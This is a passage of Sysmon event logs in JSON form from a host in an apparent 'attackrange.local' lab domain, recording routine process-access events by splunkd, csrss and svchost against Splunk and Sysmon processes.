","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:54:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4590,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:01.912\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1189-5F25-0000-0010A14A0600}\r\nTargetProcessId: 4216\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:01.912","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1189-5F25-0000-0010A14A0600}","TargetProcessId":"4216","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4591,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:01.912\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1189-5F25-0000-0010A14A0600}\r\nTargetProcessId: 4216\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:01.912","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1189-5F25-0000-0010A14A0600}","TargetProcessId":"4216","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:54:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4592,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:01.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:01.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4593,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:01.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:01.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4594,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:01.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:01.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4595,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:01.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:01.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4596,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:01.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:01.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4597,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:01.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:01.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
